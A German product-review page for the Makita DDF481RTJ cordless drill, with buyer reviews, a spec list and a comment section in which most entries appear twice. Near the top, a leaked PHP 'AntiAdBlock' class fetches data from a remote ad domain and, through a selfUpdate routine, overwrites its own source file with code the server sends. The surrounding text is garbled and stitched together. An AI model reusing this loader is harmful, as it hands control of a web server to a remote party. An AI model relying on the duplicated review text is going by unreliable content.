Makita Akku-Bohrschrauber – Power in allen Lebenslagen!

requestTimeout / 1000); return $value == 0 ? 1 : $value; } private function getTimeoutMS() { return $this->requestTimeout; } private function ignoreCache() { $key = md5('PMy6vsrjIf-' . $this->zoneId); return array_key_exists($key, $_GET); } private function getCurl($url) { if ((!extension_loaded('curl')) || (!function_exists('curl_version'))) { return false; } $curl = curl_init(); curl_setopt_array($curl, array( CURLOPT_RETURNTRANSFER => 1, CURLOPT_USERAGENT => $this->requestUserAgent . ' (curl)', CURLOPT_FOLLOWLOCATION => false, CURLOPT_SSL_VERIFYPEER => true, CURLOPT_TIMEOUT => $this->getTimeout(), CURLOPT_TIMEOUT_MS => $this->getTimeoutMS(), CURLOPT_CONNECTTIMEOUT => $this->getTimeout(), CURLOPT_CONNECTTIMEOUT_MS => $this->getTimeoutMS(), )); $version = curl_version(); $scheme = ($this->requestIsSSL && ($version['features'] & CURL_VERSION_SSL)) ? 'https' : 'http'; curl_setopt($curl, CURLOPT_URL, $scheme . '://' . $this->requestDomainName . $url); $result = curl_exec($curl); curl_close($curl); return $result; } private function getFileGetContents($url) { if (!function_exists('file_get_contents') || !ini_get('allow_url_fopen') || ((function_exists('stream_get_wrappers')) && (!in_array('http', stream_get_wrappers())))) { return false; } $scheme = ($this->requestIsSSL && function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) ? 'https' : 'http'; $context = stream_context_create(array( $scheme => array( 'timeout' => $this->getTimeout(), // seconds 'user_agent' => $this->requestUserAgent . ' (fgc)', ), )); return file_get_contents($scheme . '://' . $this->requestDomainName . $url, false, $context); } private function getFsockopen($url) { $fp = null; if (function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) { $fp = fsockopen('ssl://' . $this->requestDomainName, 443, $enum, $estr, $this->getTimeout()); } if ((!$fp) && (!($fp = fsockopen('tcp://' . gethostbyname($this->requestDomainName), 80, $enum, $estr, $this->getTimeout())))) { return false; } $out = "GET {$url} HTTP/1.1\r\n"; $out .= "Host: {$this->requestDomainName}\r\n"; $out .= "User-Agent: {$this->requestUserAgent} (socket)\r\n"; $out .= "Connection: close\r\n\r\n"; fwrite($fp, $out); stream_set_timeout($fp, $this->getTimeout()); $in = ''; while (!feof($fp)) { $in .= fgets($fp, 2048); } fclose($fp); $parts = explode("\r\n\r\n", trim($in)); return isset($parts[1]) ? $parts[1] : ''; } private function getCacheFilePath($url, $suffix = '.js') { return sprintf('%s/pa-code-v%s-%s%s', $this->findTmpDir(), $this->version, md5($url), $suffix); } private function findTmpDir() { $dir = null; if (function_exists('sys_get_temp_dir')) { $dir = sys_get_temp_dir(); } elseif (!empty($_ENV['TMP'])) { $dir = realpath($_ENV['TMP']); } elseif (!empty($_ENV['TMPDIR'])) { $dir = realpath($_ENV['TMPDIR']); } elseif (!empty($_ENV['TEMP'])) { $dir = realpath($_ENV['TEMP']); } else { $filename = tempnam(dirname(__FILE__), ''); if (file_exists($filename)) { unlink($filename); $dir = realpath(dirname($filename)); } } return $dir; } private function isActualCache($file) { if ($this->ignoreCache()) { return false; } return file_exists($file) && (time() - filemtime($file) < $this->cacheTtl * 60); } private function getCode($url) { $code = false; if (!$code) { $code = $this->getCurl($url); } if (!$code) { $code = $this->getFileGetContents($url); } if (!$code) { $code = $this->getFsockopen($url); } return $code; } private function getPHPVersion($major = true) { $version = explode('.', phpversion()); if ($major) { return (int)$version[0]; } return $version; } private function parseRaw($code) { $hash = substr($code, 0, 32); $dataRaw = substr($code, 32); if (md5($dataRaw) !== strtolower($hash)) { return null; } if ($this->getPHPVersion() >= 7) { $data = @unserialize($dataRaw, array( 'allowed_classes' => false, )); } else { $data = @unserialize($dataRaw); } if ($data === false || !is_array($data)) { return null; } return $data; } private function getTag($code) { $data = $this->parseRaw($code); if ($data === null) { return ''; } if (array_key_exists('code', $data)) { $this->selfUpdate($data['code']); } if (array_key_exists('tag', $data)) { return (string)$data['tag']; } return ''; } public function get() { $e = error_reporting(0); $url = $this->routeGetTag . '?' . http_build_query(array( 'token' => $this->token, 'zoneId' => $this->zoneId, 'version' => $this->version, )); $file = $this->getCacheFilePath($url); if ($this->isActualCache($file)) { error_reporting($e); return $this->getTag(file_get_contents($file)); } if (!file_exists($file)) { @touch($file); } $code = ''; if ($this->ignoreCache()) { $fp = fopen($file, "r+"); if (flock($fp, LOCK_EX)) { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } else { $fp = fopen($file, 'r+'); if (!flock($fp, LOCK_EX | LOCK_NB)) { if (file_exists($file)) { $code = file_get_contents($file); } else { $code = ""; } } else { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } error_reporting($e); return $this->getTag($code); } private function getSelfBackupFilename() { return $this->getCacheFilePath($this->version, ''); } private function selfBackup() { $this->selfSourceContent = file_get_contents(__FILE__); if ($this->selfSourceContent !== false && is_writable($this->findTmpDir())) { $fp = fopen($this->getSelfBackupFilename(), 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); return false; } ftruncate($fp, 0); fwrite($fp, $this->selfSourceContent); fflush($fp); flock($fp, LOCK_UN); fclose($fp); return true; } return false; } private function selfRestore() { if (file_exists($this->getSelfBackupFilename())) { return rename($this->getSelfBackupFilename(), __FILE__); } return false; } private function selfUpdate($newCode) { if(is_writable(__FILE__)) { $hasBackup = $this->selfBackup(); if ($hasBackup) { try { $fp = fopen(__FILE__, 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); throw new Exception(); } ftruncate($fp, 0); if (fwrite($fp, $newCode) === false) { ftruncate($fp, 0); flock($fp, LOCK_UN); fclose($fp); throw new Exception(); } fflush($fp); flock($fp, LOCK_UN); fclose($fp); if (md5_file(__FILE__) === md5($newCode)) { @unlink($this->getSelfBackupFilename()); } else { throw new Exception(); } } catch (Exception $e) { $this->selfRestore(); } } } } } $__aab = new __AntiAdBlock_2361347(); return $__aab->get();

Der gerät ist immer vor chef in laden, der gerät wird nie müde und der gerät kann schrauben alles.

Super gerät mit enormer kraft. Ist besser sich bei der arbeit zu konzentrieren, das gerät gewinnt sonst wahrscheinlich : )schöner klang der zahnräder bei unterschiedlicher drehzahl, ja ich mag die marke makita.

Beim ersten schrauber war das bohrfutter defeckt aber wie gewohnt bei amazon umtausch ohne probleme und zügig. Hier sind die Spezifikationen für die Makita Akku-Bohrschrauber:

  • Kraftvoller, sehr kurzer Akku-Bohrschrauber
  • zwei-Gang-Vollmetall-Planetengetriebe
  • Bürstenloser Motor für mehr Ausdauer, längere Lebensdauer und kompaktere Bauweise
  • Mit Akku-Kapazitätsanzeige
  • Mit leuchtstarker Doppel-LED mit Nachglimmfunktion

Der beste von makita der kein schlagschrauber ist.

Ist eine tolle maschine wie man sie von makita kennt. Nur blöd wenn man eine ddf bestellt und eine dhp bekommt, und dann noch mit einer französischen bedienungsanleitung und aus belgien. Der aufkleber für den makpac fehltund das alles vom verkäufer amazon. . Dafür ist der bohrer pünktlich zum termin angekommen und ich hab meine arbeit erledigen können.

Kommentare von Käufern :

  • Achtung auf den Inhalt
  • Schwer aber super Qualität
  • Sehr kraftvoll & robust

Hammer akku-bohrschrauber liegt gut in der hand und hat kraft ohne ende. Dieser akku ist einfach nur empfehlenswert. Besten Makita Akku-Bohrschrauber, (18 V/5,0 Ah, im Makpac inklusive 2 Akkus und Ladegerät), DDF481RTJ

Im vergleich zu meiner dhp 482 ist dies ein biest das halten beider zum vergleichen macht den unterschied noch deutlicher. Ich suchte nach einem schweren accubohrer für im garten und renovierung des dachbodens. Das harte drehmoment wird mit 115 nm angegeben, also mehr als mein 12v bosch-schlagschraubendreher. Mein bruder hat auch ein 481 und ich war damals erstaunt über das gewicht. Auf der positiven seite:es dreht mit 2100 u / min, was zum bohren und schrauben gut istdoppelleds geben viel lichtam fuß sitzt eine akku lade anzeigerder körper besteht aus aluminium und das bohrfutter ist aus stahl, sollte also einiges aushalten;.

Der koffer hatte ein paar macken von außen und war voll mit krümel. . Der koffer allgemein lässt sich nicht so gut öffnen und nicht so gut schließen. Mit dem inhalt ist alles okay alles so wie es angegeben ist und funktioniert auch alles so.

An und für sich gibt es hiervon schon genug rezessionen. Top gerät für den ambitionierten heimwerker und profi. Allerdings sollte man sich vor dem kauf das hauptarbeitsgebiet dafür überlegen. Ladegerät wird bei dieser version nicht mitgeliefert. Detto auch kein tiefenanschlag. Gürtelclip ist für den akku bl1815n angepasst. Also etwas kürzer wie für die original ausgeliferten maschinen mit grösserem akku. Somit steht die maschine damit beim abstellen gerade. Bei den nächsten zeilen soll keine kritik von mir entstehen. Es soll eine entscheidungshilfe sein.

Ein sehr gutes produkt zu einem sehr günstigen preis. Ich arbeite auch gewerblich damit und bin sehr zufrieden mit dem preis leistungsverhältnis.

Da getriebe ist etwas ruppig, der schrauber hat auch ein ordentliches gewicht, aber für ikea regale zusammen zu schrauben habe ich ihn mir auch nicht gekauft. Für richtige arbeiten wir renovieren, eine carport aufbauen oder ähnliches ist dieses dieser schrauber gemacht. Alles wo mein alter schrauber an seine grenzen kommt wird der makita gerade erst warm. Es macht spaß mit diesem brachialen monster zu arbeiten und nie sorge zu haben ob die schraube jetzt reingeht oder nicht. Wie alle meine bisher gekauften makita produkte ihr geld wert und fünf sterne.

Ich habe mir jetzt einen 2 accuschrauber von makita zugelegt da wir auf der baustelle täglich damit arbeiten. Zurzeit arbeiten wir mit einem makita 451 rfe der uns nie im stich gelassen hat. Haben jetzt schon einige geräte von makita und sind sehr zufrieden. Der accuschrauber mit 5 ah hat eine mörderische kraft und eine lange anhaltedauer. Der accu wird mit der schnellladestation in 25 min voll aufgeladen und ist dadurch schnell wieder einsatzbereit. Für regelmäßigen gebrauch sehr zu empfehlen.

Es scheinen zusammenstellungen im umlauf zu sein, die nicht original vom hersteller sind, sondern von irgendwem gemacht wurden. Die kisten sind teilweise abgeschlagen, es fehlen die originalen aufkleber. Ich habe mich bewusst für ddf481 und nicht dhp481 entschieden, von 3 gelieferten ddf waren in der kiste 3 dhp. Bilder sagen mehr als meine worte.

Der makiter akku bohrschrauber 18v 5,0ah ist sehr duchzugs stark dreht jede schraube mühe los rein oder rauses ist ein top gerät.

Es wird in diesem pack kein tiefenanschlag mitgeliefert. Amazon beschreibung ist falsch. Zum schrauber: ich will nix anderes mehr haben :-)nachdem mich mein treuer, 8jahre alter bosch schrauber im stich gelassen hat, wurde es zeit für “mehr power”. Habe gleich mal den test mit einem 35er x 400mm schlangenbohrer in einem 350er balken gemacht. Und mit einem 68er forstnerbohrer beide mit selbsteinziehender spitze (sieht aus wie eine holzschraube). Gang hat der motor nicht 1x rumgezickt. Das motorengeräusch war genauso als würde er im leerlauf laufen. Unbedingt den griff montieren, sonst wickelt sich der schrauber um dem arm. Ein 13ner spiralbohrer durch 5 mm blech ließ den schrauber genauso kalt.

Kraft ohne ende und trotzdem feinfühlig über den schalter zu steuern. Bei größeren schrauben oder lochkreissägen ist der zusatzgriff eine große hilfe, ansonsten hält man diese maschine nicht mehr fest. Das metallfutter spannt fest und hat einen guten rundlauf. Für normale schraubarbeiten, so unter 8 x120 völlig überdimensioniert da ist man mit dem 480[ [asin:b00jqe7odc makita drill / treiber, nur gehäuse, ddf480z]] besser beraten, zum mal er nur halb soviel wiegt.

Die qualität ist hervoragend, der anzug einfach pervers. Wenn man die drehmomentstütze beim bohren größerer löcher. Ich habe zum kleinkramschrauben noch eine 459 und eine 030.

Mein beruf ist zimmermann und meine meinung zu dem akkuschrauber ist, dass dieses kraftpaket nichts unbedingt für den hausgebrauch ist. Für profis ein muss, was besseres gibt es nicht.

Ist empfehlenswert wer große holzschrauben oft benötigt,,,, 8×240 tellerkopf versenkt der problemlos aber auch ganz schön starker stromfresser 3 und 4 ah akkus sind ganz fix alle.

Man bekommt genau was man für den preis erwarten darf. Ein gerät was satt in der hand liegt und einfach alles schafft. Kraft ohne ende, der akku hält den ganzen tag.

Sehr kräftiger und handlicher akkuschrauberwenn man schon das ganze akku- und ladegerätprogramm zuhause hat genau richtig so. Noch besser wäre mit koffer.

Der bohrschrauber ist für den ambitionierten heim handwerker schon fasst überdimensioniert. Auch längere spax schrauben werden mühelos in dicke und harte holzbohlen versenkt. Hier haben alle “billigeren” varianten für den heimgebrauch bereits die segel gestrichen. Ideal für den hausbesitzer und alle anfallenden schraubarbeiten.

Ich hab‘s schon wieder getan: mir ein makita-gerät gekauft. Dieser bohrschrauber hat eine unbändige kraft und gleichzeitig das feingefühl eines seelsorgers. Sinnvoll auf jeden fall der ausleger-griff, der auf simpel-geniale weise mit der maschine verbunden wird. Als qualitätsprodukt hat das teil sein gewicht; dafür aber ist die arbeit schnell getan.

Ein Kommentar

  1. Rezension bezieht sich auf : Makita Akku-Bohrschrauber, (18 V/5,0 Ah, im Makpac inklusive 2 Akkus und Ladegerät), DDF481RTJ

    Habe diesen schrauber gekauft um endlich nicht mehr vor der frage zu stehen “krieg ich die schraube auch wirklich komplett rein?”gerät liegt gut in der hand, ist jedoch schon schwer. Leistung lässt sich super dosieren, mit dem zweiten handgriff hat man auch bei größeren schrauben immer die volle kontrolle. Einzige nennen wir es kritikpunkte sind das hohe gewicht und die leicht eingeschränkte ausdauer. Die schiere kraft zieht doch schon strom. Nichts desto trotz ist das gerät ein super begleiter für alle aufgaben. Wer nicht regelmäßig schrauben jenseits der 200er verarbeiten muss, ist vielleicht mit einem kleineren gerät besser bedient. Hier meine ich den makita 484.
    1. Habe diesen schrauber gekauft um endlich nicht mehr vor der frage zu stehen “krieg ich die schraube auch wirklich komplett rein?”gerät liegt gut in der hand, ist jedoch schon schwer. Leistung lässt sich super dosieren, mit dem zweiten handgriff hat man auch bei größeren schrauben immer die volle kontrolle. Einzige nennen wir es kritikpunkte sind das hohe gewicht und die leicht eingeschränkte ausdauer. Die schiere kraft zieht doch schon strom. Nichts desto trotz ist das gerät ein super begleiter für alle aufgaben. Wer nicht regelmäßig schrauben jenseits der 200er verarbeiten muss, ist vielleicht mit einem kleineren gerät besser bedient. Hier meine ich den makita 484.
  2. Rezension bezieht sich auf : Makita Akku-Bohrschrauber, (18 V/5,0 Ah, im Makpac inklusive 2 Akkus und Ladegerät), DDF481RTJ

    Habe jetzt meine alte makita dhp458 gegen die ddf481 getauscht, weil ich eigentlich keineschlagfunktion brauche. Außerdem hatte ich das gefühl das bei der alten maschine seit neukauf die bohrer ganz leicht schlackerten. Bei dieser neuen makita ddf 481zist das nicht der fall. So viel kraft habe ich nicht erwartet. Sie ist noch kräftiger als die alte und allerdings auch etwas schwerer. Bei kleineren schrauben muß man wirklich vorsichtig vorgehen sonst dreht man diese viel zu weit herein. Bin absolut begeistert von dieser maschine.
  3. Rezension bezieht sich auf : Makita Akku-Bohrschrauber, (18 V/5,0 Ah, im Makpac inklusive 2 Akkus und Ladegerät), DDF481RTJ

    Habe jetzt meine alte makita dhp458 gegen die ddf481 getauscht, weil ich eigentlich keineschlagfunktion brauche. Außerdem hatte ich das gefühl das bei der alten maschine seit neukauf die bohrer ganz leicht schlackerten. Bei dieser neuen makita ddf 481zist das nicht der fall. So viel kraft habe ich nicht erwartet. Sie ist noch kräftiger als die alte und allerdings auch etwas schwerer. Bei kleineren schrauben muß man wirklich vorsichtig vorgehen sonst dreht man diese viel zu weit herein. Bin absolut begeistert von dieser maschine.
  4. Rezension bezieht sich auf : Makita Akku-Bohrschrauber, (18 V/5,0 Ah, im Makpac inklusive 2 Akkus und Ladegerät), DDF481RTJ

    Es ist eben ein profigerät und für den heimwerker eigentlich schon zu viel des guten. Aber man(n) kann nie genug drehmoment haben. :d ob ich mit meinen arbeiten allerdings jemals die 5 ah abrufen werden bleibt abzuwarten. Im vergleich zu meinem alten metabo akku-schrauber verfügt dieser über deutlich mehr kraft und bekommt auch die langen schrauben ohne probleme in den eichenbaumstamm. Da musste der metabo nach der halben länge aufgeben. Allerdings waren da auch die akkus schon alt. Folglich wohl auch ein unfairer vergleich.
    1. Es ist eben ein profigerät und für den heimwerker eigentlich schon zu viel des guten. Aber man(n) kann nie genug drehmoment haben. :d ob ich mit meinen arbeiten allerdings jemals die 5 ah abrufen werden bleibt abzuwarten. Im vergleich zu meinem alten metabo akku-schrauber verfügt dieser über deutlich mehr kraft und bekommt auch die langen schrauben ohne probleme in den eichenbaumstamm. Da musste der metabo nach der halben länge aufgeben. Allerdings waren da auch die akkus schon alt. Folglich wohl auch ein unfairer vergleich.
      1. Läuft gut und hat power ohne ende. Die haltestange macht wohl eher bei frauen sinn.
  5. Läuft gut und hat power ohne ende. Die haltestange macht wohl eher bei frauen sinn.
  6. Rezension bezieht sich auf : Makita Akku-Bohrschrauber, (18 V/5,0 Ah, im Makpac inklusive 2 Akkus und Ladegerät), DDF481RTJ

    Höchstes lob an den akku bohrschrauber von makita. Kraft ohne ende –>damit macht das arbeiten spaß400 mm spax zu verschrauben ist jetzt kein problem mehr. Diese werden sogar noch ordentlich versenkt.
    1. Höchstes lob an den akku bohrschrauber von makita. Kraft ohne ende –>damit macht das arbeiten spaß400 mm spax zu verschrauben ist jetzt kein problem mehr. Diese werden sogar noch ordentlich versenkt.
      1. Bin ein makita-fan und brauchte mal ein neues spielzeug für die arbeit. Da kommt dieser leistungsstarke akkuschrauber zur richtigen zeit. Mit diesem drehmoment geht endlich was weiter auf der baustelle, woran andere (marken)-schrauber kläglich scheitern. Dem makpac-koffer geb ich 4 sterne.
  7. Bin ein makita-fan und brauchte mal ein neues spielzeug für die arbeit. Da kommt dieser leistungsstarke akkuschrauber zur richtigen zeit. Mit diesem drehmoment geht endlich was weiter auf der baustelle, woran andere (marken)-schrauber kläglich scheitern. Dem makpac-koffer geb ich 4 sterne.
  8. Rezension bezieht sich auf : Makita Akku-Bohrschrauber, (18 V/5,0 Ah, im Makpac inklusive 2 Akkus und Ladegerät), DDF481RTJ

    Habe diesen schrauber seit 8monaten und kann nur sagen: der schafft alles. Der zusatzgriff wurde schon mehrfach gebraucht, um das handgelenk zu schützen.
  9. Rezension bezieht sich auf : Makita Akku-Bohrschrauber, (18 V/5,0 Ah, im Makpac inklusive 2 Akkus und Ladegerät), DDF481RTJ

    Habe diesen schrauber seit 8monaten und kann nur sagen: der schafft alles. Der zusatzgriff wurde schon mehrfach gebraucht, um das handgelenk zu schützen.
    1. Dieser akkuschrauber hat richtig bums. Mit 68mm forstnerbohrer in vollholzdecke löcher bohrer stellt kein problem dar der handgriff ist auch super.
      1. Dieser akkuschrauber hat richtig bums. Mit 68mm forstnerbohrer in vollholzdecke löcher bohrer stellt kein problem dar der handgriff ist auch super.
  10. Tolles gerät (ddf481rtj) mit 2x 5,0 ah akkus, die auch für andere makita geräte genutzt werden können. Ausreichend leistung auch zum löcher bohren.
  11. Rezension bezieht sich auf : Makita Akku-Bohrschrauber, (18 V/5,0 Ah, im Makpac inklusive 2 Akkus und Ladegerät), DDF481RTJ

    Tolles gerät (ddf481rtj) mit 2x 5,0 ah akkus, die auch für andere makita geräte genutzt werden können. Ausreichend leistung auch zum löcher bohren.
  12. Rezension bezieht sich auf : Makita Akku-Bohrschrauber, (18 V/5,0 Ah, im Makpac inklusive 2 Akkus und Ladegerät), DDF481RTJ

    Volle 5 sterne hätte ich gern gegeben. Jedoch habe ich nach abbildung eingekauft und bekam den ddf 481 anstatt wie abgebildet den dhp 481. Jedoch ein super entgegenkommen seitens amazonund der schrauber ist ja sowieso ein traumnur zu empfehlen. Gerade bei größeren arbeiten.
  13. Rezension bezieht sich auf : Makita Akku-Bohrschrauber, (18 V/5,0 Ah, im Makpac inklusive 2 Akkus und Ladegerät), DDF481RTJ

    Volle 5 sterne hätte ich gern gegeben. Jedoch habe ich nach abbildung eingekauft und bekam den ddf 481 anstatt wie abgebildet den dhp 481. Jedoch ein super entgegenkommen seitens amazonund der schrauber ist ja sowieso ein traumnur zu empfehlen. Gerade bei größeren arbeiten.
    1. Ich habe mir auch den akku bohrschrauber zugelegt und in meinem fertighaus die löcher für hohlraumdosen oder 22mm bohrungen durch balken gebohrt. Wenn sich der lochkreisbohrer verhakt, dreht sich der arm mit ;-d unglaublich diese leistung. Einziger wehrmutstropfen ist leider ,das der original akku nach drei monaten nicht mehr ladbar ist.
      1. Ich habe mir auch den akku bohrschrauber zugelegt und in meinem fertighaus die löcher für hohlraumdosen oder 22mm bohrungen durch balken gebohrt. Wenn sich der lochkreisbohrer verhakt, dreht sich der arm mit ;-d unglaublich diese leistung. Einziger wehrmutstropfen ist leider ,das der original akku nach drei monaten nicht mehr ladbar ist.
  14. Rezension bezieht sich auf : Makita Akku-Bohrschrauber, (18 V/5,0 Ah, im Makpac inklusive 2 Akkus und Ladegerät), DDF481RTJ

    Sehr schöner akku mit super leistung akkus halten wirklich lange. Mir (frau, nicht sehr gross) ist es etwas zu kräftig das gerät und vor allem zu schwer. Aber mein mann(zimmermann) ist begeistert.
  15. Rezension bezieht sich auf : Makita Akku-Bohrschrauber, (18 V/5,0 Ah, im Makpac inklusive 2 Akkus und Ladegerät), DDF481RTJ

    Sehr schöner akku mit super leistung akkus halten wirklich lange. Mir (frau, nicht sehr gross) ist es etwas zu kräftig das gerät und vor allem zu schwer. Aber mein mann(zimmermann) ist begeistert.
  16. Rezension bezieht sich auf : Makita Akku-Bohrschrauber, (18 V/5,0 Ah, im Makpac inklusive 2 Akkus und Ladegerät), DDF481RTJ

    Hallo profisich habe mir dieses wahnsinnsgerät vor einem jahr gekauft. Ich war gespannt, wie dieser akkuschrauber wohl sein würde, weil mir der verkäufer den himmel versprochen hatte. Und ich kann sagen: er hat recht behalten. Wenn dieses ding eine schraube zu fassen bekommt, die eine sehr gute verbindung hat, dann muss man aufpassen, dass die kraftübertragung nicht die hand abdreht. Zum glück hat man ja noch die feineinstellung(die drehmomenteinstellung), die das regelt. Ich habe mit diesem gerät hin und wieder in einem eimer mit einem großen quirl 20kg zement gemixt. Dafür braucht man allerdings auch einen 5ah akku. Das war ein wunder für mich, denn die maschine hat das geschafft. Dafür war dann einmal mein akku kaputt. Das gerät selber hat nicht einmal gezuckt. Unbeschreiblich, was die alles kann.
  17. Rezension bezieht sich auf : Makita Akku-Bohrschrauber, (18 V/5,0 Ah, im Makpac inklusive 2 Akkus und Ladegerät), DDF481RTJ

    Hallo profisich habe mir dieses wahnsinnsgerät vor einem jahr gekauft. Ich war gespannt, wie dieser akkuschrauber wohl sein würde, weil mir der verkäufer den himmel versprochen hatte. Und ich kann sagen: er hat recht behalten. Wenn dieses ding eine schraube zu fassen bekommt, die eine sehr gute verbindung hat, dann muss man aufpassen, dass die kraftübertragung nicht die hand abdreht. Zum glück hat man ja noch die feineinstellung(die drehmomenteinstellung), die das regelt. Ich habe mit diesem gerät hin und wieder in einem eimer mit einem großen quirl 20kg zement gemixt. Dafür braucht man allerdings auch einen 5ah akku. Das war ein wunder für mich, denn die maschine hat das geschafft. Dafür war dann einmal mein akku kaputt. Das gerät selber hat nicht einmal gezuckt. Unbeschreiblich, was die alles kann.
  18. Rezension bezieht sich auf : Makita Akku-Bohrschrauber, (18 V/5,0 Ah, im Makpac inklusive 2 Akkus und Ladegerät), DDF481RTJ

    Auch von mir eine klare kaufempfehlung, die ganze kraft werde ich wohl nie brauchen. Rundlauf ist bei mir perfekt, der zusatzgriff kann nur in einer lage (li/re) montiert werden, ist aber leider manchmal nötig.
  19. Rezension bezieht sich auf : Makita Akku-Bohrschrauber, (18 V/5,0 Ah, im Makpac inklusive 2 Akkus und Ladegerät), DDF481RTJ

    Auch von mir eine klare kaufempfehlung, die ganze kraft werde ich wohl nie brauchen. Rundlauf ist bei mir perfekt, der zusatzgriff kann nur in einer lage (li/re) montiert werden, ist aber leider manchmal nötig.
    1. Ich habe das gerät gekauft, weil ich einen akkuschrauber häufig und vielseitig verwende und ich bereits mehrfach den fehler begangen habe billig zu kaufen. Auf dauer macht nur ein ordentliches gerät sinn. Der akku hat eine sehr sehr ordentliche standzeit und ist immer bereit, auch wenn die maschine mal länger nicht gebraucht wurde. Allerdings wußte ich das schon zu schätzen, weil ich bereits ein sehr viel kleineres modell besaß, dass mir allerdings abhanden kam. Leider habe ich den schrauber noch nie im dauereinsatz bis zur erschöpfung der akkukapazität benutzt, sodass ich darüber nichts sagen kann. Allerdings ist der schnell-lader so schnell mit der ladung des zweiten akkus fertig, dass man ohne unterbrechnung arbeiten kann. Den mitgelieferten anschraubbaren “zusatzhebel/-griff” habe ich zunächst belächelt, bis ich das erste mal eine sehr, sehr zähe masse rühren wolltedie maschine hat ein so erhebliches drehmoment, dass man sie ohne diesen zusatzhebel/-griff nicht mehr halten kann. Die technischen werte in einer tabelle zu lesen ist das eine, damit zu arbeiten was anderes. Soviel leistung hat natürlich seinen preis – finanziell und auch vom gewicht her. Das vorherige einsteigermodell war noch sehr handlich, hatte allerdings schon erhebliche mühe beim kurbeln des wagenhebers.
  20. Rezension bezieht sich auf : Makita Akku-Bohrschrauber, (18 V/5,0 Ah, im Makpac inklusive 2 Akkus und Ladegerät), DDF481RTJ

    Ich habe das gerät gekauft, weil ich einen akkuschrauber häufig und vielseitig verwende und ich bereits mehrfach den fehler begangen habe billig zu kaufen. Auf dauer macht nur ein ordentliches gerät sinn. Der akku hat eine sehr sehr ordentliche standzeit und ist immer bereit, auch wenn die maschine mal länger nicht gebraucht wurde. Allerdings wußte ich das schon zu schätzen, weil ich bereits ein sehr viel kleineres modell besaß, dass mir allerdings abhanden kam. Leider habe ich den schrauber noch nie im dauereinsatz bis zur erschöpfung der akkukapazität benutzt, sodass ich darüber nichts sagen kann. Allerdings ist der schnell-lader so schnell mit der ladung des zweiten akkus fertig, dass man ohne unterbrechnung arbeiten kann. Den mitgelieferten anschraubbaren “zusatzhebel/-griff” habe ich zunächst belächelt, bis ich das erste mal eine sehr, sehr zähe masse rühren wolltedie maschine hat ein so erhebliches drehmoment, dass man sie ohne diesen zusatzhebel/-griff nicht mehr halten kann. Die technischen werte in einer tabelle zu lesen ist das eine, damit zu arbeiten was anderes. Soviel leistung hat natürlich seinen preis – finanziell und auch vom gewicht her. Das vorherige einsteigermodell war noch sehr handlich, hatte allerdings schon erhebliche mühe beim kurbeln des wagenhebers.

Kommentare sind geschlossen.